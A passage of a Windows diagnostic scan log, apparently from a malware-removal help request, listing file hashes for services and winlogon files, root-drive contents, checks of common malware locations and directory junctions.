[2002/08/29 14:00:00 | 000,001,989 | ---- | M] () MD5=29BB3BBBE3D49156A42BFB3DD000F554 -- C:\Old Computer\SERVICES._
 
< MD5 for: SERVICES.AIP  >
[2008/09/18 03:07:48 | 000,118,784 | ---- | M] (Adobe Systems Incorporated) MD5=41EE0A80B951D675B9227F29651511E0 -- C:\Program Files (x86)\Adobe Illustrator CS4\Plug-ins\Extensions\Services.aip
 
< MD5 for: SERVICES.BMP  >
[2001/03/14 03:14:56 | 000,005,030 | ---- | M] () MD5=FDBB222415C2E2A4129C60B3133C2E0E -- C:\Old Computer\services.bmp
 
< MD5 for: SERVICES.CFG  >
[2013/12/18 13:42:40 | 000,558,851 | ---- | M] () MD5=A044715A48D8FADB9366D554F20D3331 -- C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\Adobe\Reader 10.0\Reader\Services\Services.cfg
[2011/06/06 12:55:30 | 000,584,045 | R--- | M] () MD5=B82DD53FA8C260DDD7FDC42182DB816E -- C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744AA0100000010\10.1.0\services.cfg
[2014/05/08 06:21:20 | 000,559,489 | ---- | M] () MD5=E829329E4886E9A3540C62114FC8E145 -- C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Services\Services.cfg
 
< MD5 for: SERVICES.DLL  >
[2004/09/22 19:20:40 | 000,019,968 | ---- | M] () MD5=7273380075B0F4E45D03AE3D92954484 -- C:\Old Computer\Services.dll
 
< MD5 for: SERVICES.EX_  >
[2002/08/29 14:00:00 | 000,047,953 | ---- | M] () MD5=78718439FA165A148B2F41A9EB41F488 -- C:\Old Computer\SERVICES.EX_
 
< MD5 for: SERVICES.EXE  >
[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\ERDNT\cache64\services.exe
[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\SysNative\services.exe
[2009/07/13 20:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.exe
[2009/02/06 06:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\Old Computer\services.exe
 
< MD5 for: SERVICES.EXE.MUI  >
[2009/07/13 21:25:40 | 000,017,408 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5 -- C:\Windows\SysNative\en-US\services.exe.mui
[2009/07/13 21:25:40 | 000,017,408 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5 -- C:\Windows\winsxs\amd64_microsoft-windows-s..ontroller.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c5f238be3fa63468\services.exe.mui
 
< MD5 for: SERVICES.H  >
[2013/05/16 10:47:15 | 000,001,043 | ---- | M] () MD5=EFA6260E75D8055649F88462E3E9E929 -- C:\love mommy\mysql\include\mysql\services.h
[2014/01/14 03:16:26 | 000,001,043 | ---- | M] () MD5=EFA6260E75D8055649F88462E3E9E929 -- C:\xampp\mysql\include\mysql\services.h
 
< MD5 for: SERVICES.HTML  >
[2012/09/03 23:02:36 | 000,100,399 | ---- | M] () MD5=1194C10D4438244D9BE745657523F4BA -- C:\android-sdk_r18-windows\android-sdk-windows\docs\guide\components\services.html
[2012/09/03 23:04:19 | 000,062,982 | ---- | M] () MD5=72F32557FF33478747630F5392596CBD -- C:\android-sdk_r18-windows\android-sdk-windows\docs\guide\topics\ui\accessibility\services.html
[2012/09/03 23:01:01 | 000,043,575 | ---- | M] () MD5=90BE76D42587E10DB856CCFB014CC547 -- C:\android-sdk_r18-windows\android-sdk-windows\docs\guide\google\play\services.html
 
< MD5 for: SERVICES.INI  >
[2003/10/11 00:33:13 | 000,000,095 | ---- | M] () MD5=5A2ED046E45CB60C4555A17E280D681B -- C:\Old Computer\Services.ini
 
< MD5 for: SERVICES.JAVA  >
[2012/06/03 06:04:36 | 000,006,748 | R--- | M] () MD5=411111AD775B441DDCC5D4EFF612F591 -- C:\android-sdk_r18-windows\android-sdk-windows\sources\android-15\org\apache\harmony\security\fortress\Services.java
[2012/09/03 23:10:57 | 000,006,748 | R--- | M] () MD5=411111AD775B441DDCC5D4EFF612F591 -- C:\android-sdk_r18-windows\android-sdk-windows\sources\android-16\org\apache\harmony\security\fortress\Services.java
 
< MD5 for: SERVICES.LNK  >
[2005/09/07 17:11:19 | 000,001,613 | ---- | M] () MD5=478D58FEF844E458F4509FD8A19620D6 -- C:\System Volume Information\SystemRestore\FRStaging\Old Computer\Services.lnk
[2014/05/26 05:05:47 | 000,001,639 | ---- | M] () MD5=6CF7DC1CB6217C982B0A0D51B210E0FD -- C:\Old Computer\Services.lnk
[2009/07/13 23:54:05 | 000,001,288 | ---- | M] () MD5=CA0D9F4743DFF86EBAF09D763139E958 -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
[2009/07/13 23:54:05 | 000,001,288 | ---- | M] () MD5=CA0D9F4743DFF86EBAF09D763139E958 -- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
 
< MD5 for: SERVICES.MOCHIADS.COM.SOL  >
[2009/09/27 03:16:02 | 000,000,183 | ---- | M] () MD5=4DBA4EFD538E4B475B7E7055122C52B2 -- C:\Old Computer\services.mochiads.com.sol
 
< MD5 for: SERVICES.MOF  >
[2009/06/10 15:44:06 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\SysNative\wbem\services.mof
[2009/06/10 15:44:06 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.mof
 
< MD5 for: SERVICES.MS_  >
[2002/08/29 14:00:00 | 000,003,649 | ---- | M] () MD5=64E9F61D2ED093C361862DE36433B5E1 -- C:\Old Computer\SERVICES.MS_
 
< MD5 for: SERVICES.MSC  >
[2009/07/13 21:23:30 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysNative\en-US\services.msc
[2009/06/10 15:38:36 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysNative\services.msc
[2009/07/13 21:08:50 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysWOW64\en-US\services.msc
[2009/06/10 16:21:09 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysWOW64\services.msc
[2009/07/13 21:23:30 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\amd64_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.1.7600.16385_en-us_003408aa160fce5b\services.msc
[2009/06/10 15:38:36 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\amd64_microsoft-windows-servicessnapin_31bf3856ad364e35_6.1.7600.16385_none_2b58d44b5f6beb8a\services.msc
[2009/07/13 21:08:50 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.1.7600.16385_en-us_a4156d265db25d25\services.msc
[2009/06/10 16:21:09 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-servicessnapin_31bf3856ad364e35_6.1.7600.16385_none_cf3a38c7a70e7a54\services.msc
[2002/08/29 07:00:00 | 000,033,464 | ---- | M] () MD5=E8089AA2A6F7FEE89B38C1F2D77BA6C6 -- C:\Old Computer\services.msc
 
< MD5 for: SERVICES.PTXML  >
[2009/07/13 15:16:17 | 000,001,061 | ---- | M] () MD5=640D7DD61B1CFA6C96F80F68F78CDFA7 -- C:\Windows\SysNative\wdi\perftrack\Services.ptxml
[2009/07/13 15:16:17 | 000,001,061 | ---- | M] () MD5=640D7DD61B1CFA6C96F80F68F78CDFA7 -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\Services.ptxml
 
< MD5 for: SERVICES.RDB  >
[2012/08/13 10:51:02 | 000,178,348 | ---- | M] () MD5=039C8CFBD74EE07F38CD9E4C7D95C5C6 -- C:\Program Files (x86)\OpenOffice.org 3\Basis\program\services.rdb
[2012/08/13 10:51:02 | 000,000,453 | ---- | M] () MD5=3D2ADA15FEF5B5FF468243161543D610 -- C:\Program Files (x86)\OpenOffice.org 3\program\services.rdb
[2012/08/10 15:12:16 | 000,008,060 | ---- | M] () MD5=7CA7D7150EC46321162F932ADCF5F35B -- C:\Program Files (x86)\OpenOffice.org 3\URE\misc\services.rdb
 
< MD5 for: SERVICES.TICO  >
[2002/04/02 23:39:26 | 000,002,038 | ---- | M] () MD5=B15FB3A60F5BA41109C6F94067C8DC62 -- C:\Old Computer\services.tico
 
< MD5 for: WINLOGON.ADML  >
[2009/07/13 21:25:22 | 000,008,013 | ---- | M] () MD5=CED0EAD8D152B3D0F114698DE2316C5E -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-adm.resources_31bf3856ad364e35_6.1.7600.16385_en-us_f0f9032ef6930070\WinLogon.adml
 
< MD5 for: WINLOGON.ADMX  >
[2009/06/10 16:04:41 | 000,005,237 | ---- | M] () MD5=89D8F50E186A16C2CED3CF36DBBC0B2C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-adm_31bf3856ad364e35_6.1.7600.16385_none_d7024e6992f3424d\WinLogon.admx
 
< MD5 for: WINLOGON.EX_  >
[2002/08/29 14:00:00 | 000,271,067 | ---- | M] () MD5=C73F996304F177262B0C2B70A7DCB66C -- C:\Old Computer\WINLOGON.EX_
 
< MD5 for: WINLOGON.EXE  >
[2010/11/20 08:25:30 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\System Volume Information\SystemRestore\FRStaging\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe
[2010/11/20 08:25:30 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\ERDNT\cache64\winlogon.exe
[2010/11/20 08:25:30 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe
[2009/07/13 20:39:52 | 000,389,120 | ---- | M] (Microsoft Corporation) MD5=132328DF455B0028F13BF0ABEE51A63A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16385_none_cbb7f2bdeea2829c\winlogon.exe
[2014/03/04 06:08:14 | 000,455,680 | ---- | M] (Microsoft Corporation) MD5=6CE2AE073BD21C542FC2C707CAE944CC -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.22616_none_ce748d1d04acf24f\winlogon.exe
[2014/03/04 04:43:50 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=88AB9B72B4BF3963A0DE0820B4B0B06C -- C:\Windows\SysNative\winlogon.exe
[2014/03/04 04:43:50 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=88AB9B72B4BF3963A0DE0820B4B0B06C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.18409_none_cdf8bf35eb848572\winlogon.exe
[2014/04/03 09:49:02 | 000,742,200 | ---- | M] (MalwareBytes) MD5=96820649733BFB2B0499C371904B7B40 -- C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\Malwarebytes Anti-Malware\Chameleon\Windows\winlogon.exe
[2009/10/28 02:01:57 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=A93D41A4D4B0D91C072D11DD8AF266DE -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.20560_none_cc522fd507b468f8\winlogon.exe
[2014/05/30 08:12:06 | 001,940,216 | ---- | M] (Bleeping Computer, LLC) MD5=BA48F4C0988795FBEADAE23BE988054D -- C:\Users\Owner\Downloads\WiNlOgOn.exe
[2009/10/28 01:24:40 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=DA3E2A6FA9660CC75B471530CE88453A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16447_none_cbe534e7ee8042ad\winlogon.exe
[2008/04/13 19:12:39 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\Old Computer\winlogon.exe
 
< MD5 for: WINLOGON.EXE.MUI  >
[2010/11/20 08:00:25 | 000,023,040 | ---- | M] (Microsoft Corporation) MD5=34C7D2E30868EDAFB191341D963ABA5F -- C:\Windows\SysNative\en-US\winlogon.exe.mui
[2010/11/20 08:00:25 | 000,023,040 | ---- | M] (Microsoft Corporation) MD5=34C7D2E30868EDAFB191341D963ABA5F -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon.resources_31bf3856ad364e35_6.1.7601.17514_en-us_291e96fa1ab5fc7b\winlogon.exe.mui
[2009/07/13 21:29:52 | 000,022,528 | ---- | M] (Microsoft Corporation) MD5=56D03B64B8C483C1D12A8E4577B3B332 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon.resources_31bf3856ad364e35_6.1.7600.16385_en-us_26ed83321dc778e1\winlogon.exe.mui
 
< MD5 for: WINLOGON.EXE-8163EECC.PF  >
[2014/05/30 10:29:17 | 000,024,606 | ---- | M] () MD5=90A7DD1CF093EBB5930442F8FD2EBF17 -- C:\Windows\Prefetch\WINLOGON.EXE-8163EECC.pf
 
< MD5 for: WINLOGON.MFL  >
[2009/07/13 21:27:22 | 000,001,080 | ---- | M] () MD5=2783ED50691284F7EAE6BE9729337E1A -- C:\Windows\SysNative\wbem\en-US\winlogon.mfl
[2009/07/13 21:27:22 | 000,001,080 | ---- | M] () MD5=2783ED50691284F7EAE6BE9729337E1A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-mof.resources_31bf3856ad364e35_6.1.7600.16385_en-us_84afd4fd38ffd276\winlogon.mfl
 
< MD5 for: WINLOGON.MOF  >
[2009/07/13 15:30:01 | 000,003,192 | ---- | M] () MD5=DF722B96F32A61783BC310FACF10240B -- C:\Windows\SysNative\wbem\winlogon.mof
[2009/07/13 15:30:01 | 000,003,192 | ---- | M] () MD5=DF722B96F32A61783BC310FACF10240B -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-mof_31bf3856ad364e35_6.1.7600.16385_none_dc2dbb778f98e40f\winlogon.mof
 
< MD5 for: WINLOGON.REG  >
[2001/10/23 23:49:08 | 000,000,278 | ---- | M] () MD5=329635F24C2EB6E4B850598AC7CC7AA4 -- C:\Old Computer\winlogon.reg
 
< %SYSTEMDRIVE%\*.* >
[2009/10/02 18:10:22 | 000,000,622 | ---- | M] () -- C:\0
[2013/05/05 16:47:02 | 000,000,063 | ---- | M] () -- C:\1.html
[2014/04/20 20:05:28 | 000,000,040 | -H-- | M] () -- C:\28A87DD3C73F
[2013/04/27 21:05:37 | 000,000,448 | ---- | M] () -- C:\attach.ini
[2014/04/27 16:07:22 | 000,000,000 | ---- | M] () -- C:\autoexec.bat
[2010/11/20 07:40:07 | 000,383,786 | RHS- | M] () -- C:\bootmgr
[2010/03/29 21:41:54 | 000,008,192 | RHS- | M] () -- C:\BOOTSECT.BAK
[2010/03/30 18:34:14 | 000,000,125 | ---- | M] () -- C:\FINIS_IT.TXT
[2012/06/11 09:04:54 | 000,001,106 | -H-- | M] () -- C:\IPH.PH
[2013/04/25 21:34:13 | 000,000,005 | ---- | M] () -- C:\mail.ini
[2013/04/27 20:54:52 | 000,000,236 | ---- | M] () -- C:\mapui.ini
[2010/05/06 04:09:12 | 000,000,109 | ---- | M] () -- C:\mbam-error.txt
[2006/12/02 01:37:14 | 000,904,704 | ---- | M] (Microsoft Corporation) -- C:\msdia80.dll
[2013/04/26 20:16:30 | 000,000,029 | ---- | M] () -- C:\noticeui.ini
[2012/10/12 02:11:09 | 1363,148,790 | ---- | M] () -- C:\OC
[2014/05/30 10:50:57 | 4284,719,103 | -HS- | M] () -- C:\pagefile.sys
[2014/05/30 08:19:46 | 000,227,546 | ---- | M] () -- C:\TDSSKiller.3.0.0.37_30.05.2014_08.16.18_log.txt
[2012/04/28 16:42:21 | 000,000,050 | ---- | M] () -- C:\user.js
[2012/10/14 13:53:26 | 000,000,488 | ---- | M] () -- C:\WGH_CA_CHEATLOG.txt
[2012/10/13 19:05:43 | 000,001,114 | ---- | M] () -- C:\[CA]Config.ini
[2013/04/29 03:18:42 | 000,002,616 | ---- | M] () -- C:\{4271E4E0-922B-4162-BC7D-D77ABF10DA37}
[2013/07/22 04:37:31 | 000,002,208 | ---- | M] () -- C:\{AACA22D6-8109-43C9-B3A0-FE968E5993B7}
 
< %systemroot%\Fonts\*.com >
[2009/07/14 00:32:31 | 000,026,040 | ---- | M] () -- C:\Windows\Fonts\GlobalMonospace.CompositeFont
[2009/07/14 00:32:31 | 000,026,489 | ---- | M] () -- C:\Windows\Fonts\GlobalSansSerif.CompositeFont
[2009/07/14 00:32:31 | 000,029,779 | ---- | M] () -- C:\Windows\Fonts\GlobalSerif.CompositeFont
[2009/07/14 00:32:31 | 000,043,318 | ---- | M] () -- C:\Windows\Fonts\GlobalUserInterface.CompositeFont
 
< %systemroot%\Fonts\*.dll >
 
< %systemroot%\Fonts\*.ini >
[2009/06/10 15:49:50 | 000,000,065 | ---- | M] () -- C:\Windows\Fonts\desktop.ini
 
< %systemroot%\Fonts\*.ini2 >
 
< %systemroot%\Fonts\*.exe >
 
< %systemroot%\system32\spool\prtprocs\w32x86\*.* >
 
< %systemroot%\REPAIR\*.bak1 >
 
< %systemroot%\REPAIR\*.ini >
 
< %systemroot%\system32\*.jpg >
 
< %systemroot%\*.jpg >
 
< %systemroot%\*.png >
 
< %systemroot%\*.scr >
[2010/10/15 22:18:27 | 001,737,052 | ---- | M] () -- C:\Windows\HalloweenScreamsaver.scr
[2012/03/08 18:37:20 | 000,302,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\WLXPGSS.SCR
[3 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
< %systemroot%\*._sy >
 
< %APPDATA%\Adobe\Update\*.* >
 
< %ALLUSERSPROFILE%\Favorites\*.* >
 
< %APPDATA%\Microsoft\*.* >
 
< %PROGRAMFILES%\*.* >
[2010/12/04 12:43:27 | 230,797,822 | ---- | M] () -- C:\Program Files (x86)\Adobe Flash CS4.rar
[2010/11/06 10:13:06 | 242,254,547 | ---- | M] () -- C:\Program Files (x86)\Adobe Illustrator CS4.rar
[2009/07/13 23:54:24 | 000,000,174 | -HS- | M] () -- C:\Program Files (x86)\desktop.ini
[2014/05/25 19:23:07 | 004,296,192 | ---- | M] () -- C:\Program Files (x86)\SO.Booster
[2014/05/25 19:23:08 | 000,174,928 | ---- | M] () -- C:\Program Files (x86)\SOSvc.dll
[2014/05/25 19:23:08 | 004,210,176 | ---- | M] () -- C:\Program Files (x86)\SO_x64.Booster
 
< %APPDATA%\Update\*.* >
 
< %systemroot%\*. /mp /s >
 
< dir "%systemdrive%\*" /S /A:L /C >
 Volume in drive C is HP
 Volume Serial Number is 960A-5CE9
 Directory of C:\
07/14/2009  00:08    <JUNCTION>     Documents and Settings [C:\Users]
               0 File(s)              0 bytes
 Directory of C:\ProgramData
07/14/2009  00:08    <JUNCTION>     Application Data [C:\ProgramData]
07/14/2009  00:08    <JUNCTION>     Desktop [C:\Users\Public\Desktop]
07/14/2009  00:08    <JUNCTION>     Documents [C:\Users\Public\Documents]
07/14/2009  00:08    <JUNCTION>     Favorites [C:\Users\Public\Favorites]
07/14/2009  00:08    <JUNCTION>     Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
07/14/2009  00:08    <JUNCTION>     Templates [C:\ProgramData\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users
07/14/2009  00:08    <SYMLINKD>     All Users [C:\ProgramData]
07/14/2009  00:08    <JUNCTION>     Default User [C:\Users\Default]
               0 File(s)              0 bytes
 Directory of C:\Users\All Users
07/14/2009  00:08    <JUNCTION>     Application Data [C:\ProgramData]
07/14/2009  00:08    <JUNCTION>     Desktop [C:\Users\Public\Desktop]
07/14/2009  00:08    <JUNCTION>     Documents [C:\Users\Public\Documents]
07/14/2009  00:08    <JUNCTION>     Favorites [C:\Users\Public\Favorites]
07/14/2009  00:08    <JUNCTION>     Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
07/14/2009  00:08    <JUNCTION>     Templates [C:\ProgramData\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\Classic .NET AppPool
04/27/2014  18:23    <JUNCTION>     Application Data [C:\Users\Classic .NET AppPool\AppData\Roaming]
04/27/2014  18:23    <JUNCTION>     Cookies [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Cookies]
04/27/2014  18:23    <JUNCTION>     Local Settings [C:\Users\Classic .NET AppPool\AppData\Local]
04/27/2014  18:23    <JUNCTION>     My Documents [C:\Users\Classic .NET AppPool\Documents]
04/27/2014  18:23    <JUNCTION>     NetHood [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
04/27/2014  18:23    <JUNCTION>     PrintHood [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
04/27/2014  18:23    <JUNCTION>     Recent [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Recent]
04/27/2014  18:23    <JUNCTION>     SendTo [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\SendTo]
04/27/2014  18:23    <JUNCTION>     Start Menu [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Start Menu]
04/27/2014  18:23    <JUNCTION>     Templates [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\Classic .NET AppPool\AppData\Local
04/27/2014  18:23    <JUNCTION>     Application Data [C:\Users\Classic .NET AppPool\AppData\Local]
04/27/2014  18:23    <JUNCTION>     History [C:\Users\Classic .NET AppPool\AppData\Local\Microsoft\Windows\History]
04/27/2014  18:23    <JUNCTION>     Temporary Internet Files [C:\Users\Classic .NET AppPool\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Users\Classic .NET AppPool\Documents
04/27/2014  18:23    <JUNCTION>     My Music [C:\Users\Classic .NET AppPool\Music]
04/27/2014  18:23    <JUNCTION>     My Pictures [C:\Users\Classic .NET AppPool\Pictures]
04/27/2014  18:23    <JUNCTION>     My Videos [C:\Users\Classic .NET AppPool\Videos]
               0 File(s)              0 bytes
 Directory of C:\Users\Default
07/14/2009  00:08    <JUNCTION>     Application Data [C:\Users\Default\AppData\Roaming]
07/14/2009  00:08    <JUNCTION>     Local Settings [C:\Users\Default\AppData\Local]
07/14/2009  00:08    <JUNCTION>     My Documents [C:\Users\Default\Documents]
07/14/2009  00:08    <JUNCTION>     NetHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
07/14/2009  00:08    <JUNCTION>     PrintHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
07/14/2009  00:08    <JUNCTION>     Recent [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent]
07/14/2009  00:08    <JUNCTION>     SendTo [C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo]
07/14/2009  00:08    <JUNCTION>     Start Menu [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu]
07/14/2009  00:08    <JUNCTION>     Templates [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\Default\AppData\Local
07/14/2009  00:08    <JUNCTION>     Application Data [C:\Users\Default\AppData\Local]
07/14/2009  00:08    <JUNCTION>     History [C:\Users\Default\AppData\Local\Microsoft\Windows\History]
07/14/2009  00:08    <JUNCTION>     Temporary Internet Files [C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Users\Default\Documents
07/14/2009  00:08    <JUNCTION>     My Music [C:\Users\Default\Music]
07/14/2009  00:08    <JUNCTION>     My Pictures [C:\Users\Default\Pictures]
07/14/2009  00:08    <JUNCTION>     My Videos [C:\Users\Default\Videos]
               0 File(s)              0 bytes
 Directory of C:\Users\DefaultAppPool
04/27/2014  18:29    <JUNCTION>     Application Data [C:\Users\DefaultAppPool\AppData\Roaming]
04/27/2014  18:29    <JUNCTION>     Cookies [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Cookies]
04/27/2014  18:29    <JUNCTION>     Local Settings [C:\Users\DefaultAppPool\AppData\Local]
04/27/2014  18:29    <JUNCTION>     My Documents [C:\Users\DefaultAppPool\Documents]
04/27/2014  18:29    <JUNCTION>     NetHood [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
04/27/2014  18:29    <JUNCTION>     PrintHood [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
04/27/2014  18:29    <JUNCTION>     Recent [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Recent]
04/27/2014  18:29    <JUNCTION>     SendTo [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\SendTo]
04/27/2014  18:29    <JUNCTION>     Start Menu [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu]
04/27/2014  18:29    <JUNCTION>     Templates [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\DefaultAppPool\AppData\Local
04/27/2014  18:29    <JUNCTION>     Application Data [C:\Users\DefaultAppPool\AppData\Local]
04/27/2014  18:29    <JUNCTION>     History [C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\History]
04/27/2014  18:29    <JUNCTION>     Temporary Internet Files [C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Users\DefaultAppPool\Documents
04/27/2014  18:29    <JUNCTION>     My Music [C:\Users\DefaultAppPool\Music]
04/27/2014  18:29    <JUNCTION>     My Pictures [C:\Users\DefaultAppPool\Pictures]
04/27/2014  18:29    <JUNCTION>     My Videos [C:\Users\DefaultAppPool\Videos]
               0 File(s)              0 bytes
 Directory of C:\Users\Mcx1-OWNER-PC
08/25/2011  03:33    <JUNCTION>     Application Data [C:\Users\Mcx1-OWNER-PC\AppData\Roaming]
08/25/2011  03:33    <JUNCTION>     Cookies [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Cookies]
08/25/2011  03:33    <JUNCTION>     Local Settings [C:\Users\Mcx1-OWNER-PC\AppData\Local]
08/25/2011  03:33    <JUNCTION>     My Documents [C:\Users\Mcx1-OWNER-PC\Documents]
08/25/2011  03:33    <JUNCTION>     NetHood [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
08/25/2011  03:33    <JUNCTION>     PrintHood [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
08/25/2011  03:33    <JUNCTION>     Recent [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Recent]
08/25/2011  03:33    <JUNCTION>     SendTo [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\SendTo]
08/25/2011  03:33    <JUNCTION>     Start Menu [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Start Menu]
08/25/2011  03:33    <JUNCTION>     Templates [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Templates]
               0 File(s)              0 bytes
 Directory of C:\Users\Mcx1-OWNER-PC\AppData\Local
08/25/2011  03:33    <JUNCTION>     Application Data [C:\Users\Mcx1-OWNER-PC\AppData\Local]
08/25/2011  03:33    <JUNCTION>     History [C:\Users\Mcx1-OWNER-PC\AppData\Local\Microsoft\Windows\History]
08/25/2011  03:33    <JUNCTION>     Temporary Internet Files [C:\Users\Mcx1-OWNER-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files]
               0 File(s)              0 bytes
 Directory of C:\Users\Mcx1-OWNER-PC\Documents
08/25/2011  03:33    <JUNCTION>     My Music [C:\Users\Mcx1-OWNER-PC\Music]
08/25/2011  03:33    <JUNCTION>     My Pictures [C:\Users\Mcx1-OWNER-PC\Pictures]
08/25/2011  03:33    <JUNCTION>     My Videos [C:\Users\Mcx1-OWNER-PC\Videos]
               0 File(s)              0 bytes
 Directory of C:\Users\Nick
03/30/2010  19:19    <JUNCTION>     Application Data [C:\Users\Nick\AppData\Roaming]
